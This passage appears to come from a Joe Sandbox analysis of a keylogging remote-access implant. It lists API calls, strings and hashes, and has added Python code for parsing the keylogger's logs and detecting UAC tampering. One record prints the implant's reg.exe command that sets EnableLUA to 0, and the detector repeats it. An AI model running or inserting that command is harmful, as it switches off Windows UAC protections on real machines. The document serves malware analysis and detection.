                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: EventLocalTimewsprintf
                                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                • API String ID: 1497725170-248792730
                                                • Opcode ID: d47f6fbfcddc5f950be7bc6af301cd0dd5aecde9aff08f33bdbb9e4de45e3f1a
                                                • Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
                                                • Opcode Fuzzy Hash: d47f6fbfcddc5f950be7bc6af301cd0dd5aecde9aff08f33bdbb9e4de45e3f1a
                                                • Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9
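The two records above expose enough of the offline keylogger's on-disk format to parse a recovered log: the clipboard routine brackets pasted text with "[Text copied to clipboard]" and "[End of clipboard]", and the session header is written with wsprintfW as "[%04i/%02i/%02i %02i:%02i:%02i " followed by "Offline Keylogger Started" and "]". The parser below is an added example, not code from the report or from the malware. It assumes (the report does not show this) that every logged window gets the same bracketed timestamp header with the window title in place of "Offline Keylogger Started"; the sample log is constructed.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Header format recovered from the sample: wsprintfW("[%04i/%02i/%02i %02i:%02i:%02i " ...)
# followed by the label and "]". Assumption (not shown in the report): the same header
# precedes every logged window, with the window title as the label.
HEADER_RE = re.compile(r"^\[(\d{4})/(\d{2})/(\d{2}) (\d{2}):(\d{2}):(\d{2}) (.*)\]$")
CLIP_START = "[Text copied to clipboard]"   # marker strings from the clipboard routine
CLIP_END = "[End of clipboard]"
SESSION_LABEL = "Offline Keylogger Started"


@dataclass
class Entry:
    timestamp: str                 # "YYYY/MM/DD HH:MM:SS" exactly as the format string writes it
    label: str                     # text between the timestamp and the closing bracket
    keystrokes: List[str] = field(default_factory=list)
    clipboard: List[str] = field(default_factory=list)


def parse_keylog(text: str) -> List[Entry]:
    """Split a recovered log into timestamped entries. Clipboard blocks are kept apart
    from typed text so a pasted password is not mistaken for keystrokes."""
    entries: List[Entry] = []
    current: Optional[Entry] = None
    clip: Optional[List[str]] = None       # non-None while inside a clipboard block
    for raw in text.splitlines():
        line = raw.rstrip("\r")
        if clip is not None:                # inside a clipboard block: headers are data here
            if line == CLIP_END:
                if current is not None:
                    current.clipboard.append("\n".join(clip))
                clip = None
            else:
                clip.append(line)
            continue
        if line == CLIP_START:
            clip = []
            continue
        m = HEADER_RE.match(line)
        if m:
            y, mo, d, h, mi, s, label = m.groups()
            current = Entry(f"{y}/{mo}/{d} {h}:{mi}:{s}", label)
            entries.append(current)
        elif current is not None and line:
            current.keystrokes.append(line)
    # Edge case: log cut off inside a clipboard block (implant killed mid-write).
    if clip is not None and current is not None:
        current.clipboard.append("\n".join(clip))
    return entries


def session_starts(entries: List[Entry]) -> List[str]:
    """Timestamps at which the implant (re)started offline logging."""
    return [e.timestamp for e in entries if e.label == SESSION_LABEL]


def clipboard_items(entries: List[Entry]) -> List[str]:
    return [c for e in entries for c in e.clipboard]


# Constructed sample log (not from the report). The Notepad header is the assumed
# per-window form described above; the two session headers use the recovered format.
SAMPLE_LOG = (
    "[2024/12/20 10:15:30 Offline Keylogger Started]\n"
    "[2024/12/20 10:15:41 Untitled - Notepad]\n"
    "user@example.com\n"
    "[Text copied to clipboard]\n"
    "hunter2\n"
    "[End of clipboard]\n"
    "[2024/12/20 10:16:02 Offline Keylogger Started]\n"
)

if __name__ == "__main__":
    for e in parse_keylog(SAMPLE_LOG):
        print(e.timestamp, e.label, e.keystrokes, e.clipboard)
```

Because the header is built with the wide wsprintfW, the buffer is UTF-16 in memory; check the encoding of the recovered file before decoding it to text, since the report does not establish how it is written to disk.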
                                                APIs
                                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$CloseCreateHandleSizeSleep
                                                • String ID: `AG
                                                • API String ID: 1958988193-3058481221
                                                • Opcode ID: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
                                                • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                • Opcode Fuzzy Hash: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
                                                • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                                                APIs
                                                • RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                • GetLastError.KERNEL32 ref: 0041CA91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ClassCreateErrorLastRegisterWindow
                                                • String ID: 0$MsgWindowClass
                                                • API String ID: 2877667751-2410386613
                                                • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                • Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
                                                • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                • Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5
                                                APIs
                                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                • CloseHandle.KERNEL32(?), ref: 00406A14
                                                Strings
                                                • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseHandle$CreateProcess
                                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                • API String ID: 2922976086-4183131282
                                                • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                • Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
                                                • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                • Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9
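The CreateProcessA record above gives the exact command the implant runs to switch UAC off: cmd.exe /k followed by reg.exe ADD on HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, value EnableLUA, REG_DWORD 0. The detection below is an added example, not part of the Joe Sandbox report: it runs a command-line pattern over constructed process-creation events (Sysmon Event ID 1 style) and parses reg query output to confirm whether the value has already been written. The events, the MSBuild.exe parent (taken from the snapshot file name hcaresult_12_2_400000_MSBuild, so an inference) and the reg query output are constructed; only the key path, value name and data come from the report.

```python
import re
from typing import Dict, List, Optional

# Command line recovered from the sample's CreateProcessA call:
#   cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
#          /v EnableLUA /t REG_DWORD /d 0 /f
# The pattern keys on the effect (EnableLUA written as 0 under the Policies\System key)
# rather than the literal string, so the hive alias, quoting and hex forms still match.
UAC_DISABLE_RE = re.compile(
    r'reg(?:\.exe)?\s+add\s+"?(?:HKLM|HKEY_LOCAL_MACHINE)\\SOFTWARE\\Microsoft\\Windows'
    r'\\CurrentVersion\\Policies\\System"?\s.*?/v\s+EnableLUA\b.*?/d\s+(?:0x)?0+\b',
    re.IGNORECASE,
)


def is_uac_disable(cmdline: str) -> bool:
    return UAC_DISABLE_RE.search(cmdline) is not None


def scan_process_events(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return the events whose CommandLine disables UAC, keeping parent context for
    triage. Both the cmd.exe launcher and the reg.exe it spawns match."""
    return [
        {"index": i, "image": ev.get("Image", ""), "parent": ev.get("ParentImage", "")}
        for i, ev in enumerate(events)
        if is_uac_disable(ev.get("CommandLine", ""))
    ]


# Output line format of: reg query HKLM\...\Policies\System /v EnableLUA
REG_QUERY_RE = re.compile(r"^\s*EnableLUA\s+REG_DWORD\s+0x([0-9a-fA-F]+)\s*$", re.MULTILINE)


def enablelua_from_reg_query(output: str) -> Optional[int]:
    """Current EnableLUA value parsed from reg query output; None if the value is absent."""
    m = REG_QUERY_RE.search(output)
    return int(m.group(1), 16) if m else None


# Constructed process-creation events (Sysmon Event ID 1 style, not from the report).
# The MSBuild.exe parent is an assumption drawn from the report's snapshot file name.
EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "CommandLine": r"C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'reg.exe ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0x0 /f'},
    {"Image": r"C:\Windows\System32\reg.exe",           # benign: re-enables UAC
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f"},
    {"Image": r"C:\Windows\System32\reg.exe",           # benign: read-only query
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA"},
]

# Constructed reg query output from a host where the change has already landed.
REG_QUERY_OUTPUT = (
    "\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\r\n"
    "    EnableLUA    REG_DWORD    0x0\r\n\r\n"
)

if __name__ == "__main__":
    for hit in scan_process_events(EVENTS):
        print("UAC disable:", hit)
    print("EnableLUA on host:", enablelua_from_reg_query(REG_QUERY_OUTPUT))
```

Setting EnableLUA to 0 only takes effect after the next restart, so the reg.exe process event is the earliest signal; the value check tells you whether a host still needs the key restored before it reboots.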
                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,?,?,0044252A,?), ref: 004425F9
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
                                                • FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,?,?,0044252A,?), ref: 0044262F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                • Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
                                                • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                • Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C
                                                APIs
                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00475B70,0040483F,00000001,?,?,00000000,00475B70,004017F3), ref: 00404AED
                                                • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404AF9
                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,004017F3), ref: 00404B04
                                                • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404B0D
                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                • String ID: KeepAlive | Disabled
                                                • API String ID: 2993684571-305739064
                                                • Opcode ID: 68b50adcbc3edbb9d4c8525224eb9d153fc5f31cab3a74662374d300908f4771
                                                • Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
                                                • Opcode Fuzzy Hash: 68b50adcbc3edbb9d4c8525224eb9d153fc5f31cab3a74662374d300908f4771
                                                • Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B
                                                APIs
                                                • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
                                                • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
                                                • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
                                                • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6
                                                Strings
                                                • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                • API String ID: 3024135584-2418719853
                                                • Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                • Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                APIs
                                                • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                                                • GetProcAddress.KERNEL32(00000000), ref: 00401441
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID: GetCursorInfo$User32.dll$`#v
                                                • API String ID: 1646373207-1032071883
                                                • Opcode ID: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                • Instruction ID: fea3bfcfa5ad703f85b7dd8d5f3eac54d033561bc9bd2fc33d3800e380b32b62
                                                • Opcode Fuzzy Hash: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                • Instruction Fuzzy Hash: 51B092B868A3059BC7306BE0BD0EA093B24EA44703B1000B2F087C12A1EB7880809A6E
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 540239c3c7a8b78e424bcf486381df198cb5d8aead86a72beee1c9aef6a9193c
                                                • Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
                                                • Opcode Fuzzy Hash: 540239c3c7a8b78e424bcf486381df198cb5d8aead86a72beee1c9aef6a9193c
                                                • Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9
                                                APIs
                                                  • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                • String ID:
                                                • API String ID: 3525466593-0
                                                • Opcode ID: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                • Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
                                                • Opcode Fuzzy Hash: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                • Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99
                                                APIs
                                                  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                  • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
                                                  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                • String ID:
                                                • API String ID: 4269425633-0
                                                • Opcode ID: 296a05bfb99c111a27fc262cb636efe6a000d6565ad7e80475f435e5bd850ba0
                                                • Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
                                                • Opcode Fuzzy Hash: 296a05bfb99c111a27fc262cb636efe6a000d6565ad7e80475f435e5bd850ba0
                                                • Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                • Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
                                                • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                • Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0042CE53,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53), ref: 0044FF20
                                                • __alloca_probe_16.LIBCMT ref: 0044FF58
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,0042CE53,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53,?), ref: 0044FFA9
                                                • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53,?,00000002,?), ref: 0044FFBB
                                                • __freea.LIBCMT ref: 0044FFC4
                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                • String ID:
                                                • API String ID: 313313983-0
                                                • Opcode ID: e53b112c27c8f78300b60669bd3e779d88e901d1b4b0f4bdaec59810f61dd2f3
                                                • Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
                                                • Opcode Fuzzy Hash: e53b112c27c8f78300b60669bd3e779d88e901d1b4b0f4bdaec59810f61dd2f3
                                                • Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4
                                                APIs
                                                • GetEnvironmentStringsW.KERNEL32 ref: 0044E144
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
                                                • _free.LIBCMT ref: 0044E1A0
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                • String ID:
                                                • API String ID: 336800556-0
                                                • Opcode ID: 1c337325f04e7d1350835243513ef37ea9cf72bd865eed212f137dea6565717b
                                                • Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
                                                • Opcode Fuzzy Hash: 1c337325f04e7d1350835243513ef37ea9cf72bd865eed212f137dea6565717b
                                                • Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9
                                                APIs
                                                • GetLastError.KERNEL32(?,00000000,00000000,0043A7C2,00000000,?,?,0043A846,00000000,00000000,00000000,00000000,00000000,00000000,00402C08,?), ref: 00446F48
                                                • _free.LIBCMT ref: 00446F7D
                                                • _free.LIBCMT ref: 00446FA4
                                                • SetLastError.KERNEL32(00000000), ref: 00446FB1
                                                • SetLastError.KERNEL32(00000000), ref: 00446FBA
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$_free
                                                • String ID:
                                                • API String ID: 3170660625-0
                                                • Opcode ID: f4408b0af08e6f25a576fef194bdae15b87294ed1dfbee705da3a0fd61bfb56a
                                                • Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
                                                • Opcode Fuzzy Hash: f4408b0af08e6f25a576fef194bdae15b87294ed1dfbee705da3a0fd61bfb56a
                                                • Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F
                                                APIs
                                                • _free.LIBCMT ref: 0044F7B5
                                                  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                • _free.LIBCMT ref: 0044F7C7
                                                • _free.LIBCMT ref: 0044F7D9
                                                • _free.LIBCMT ref: 0044F7EB
                                                • _free.LIBCMT ref: 0044F7FD
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                • Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
                                                • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                • Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C
                                                APIs
                                                • _free.LIBCMT ref: 00443305
                                                  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                • _free.LIBCMT ref: 00443317
                                                • _free.LIBCMT ref: 0044332A
                                                • _free.LIBCMT ref: 0044333B
                                                • _free.LIBCMT ref: 0044334C
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
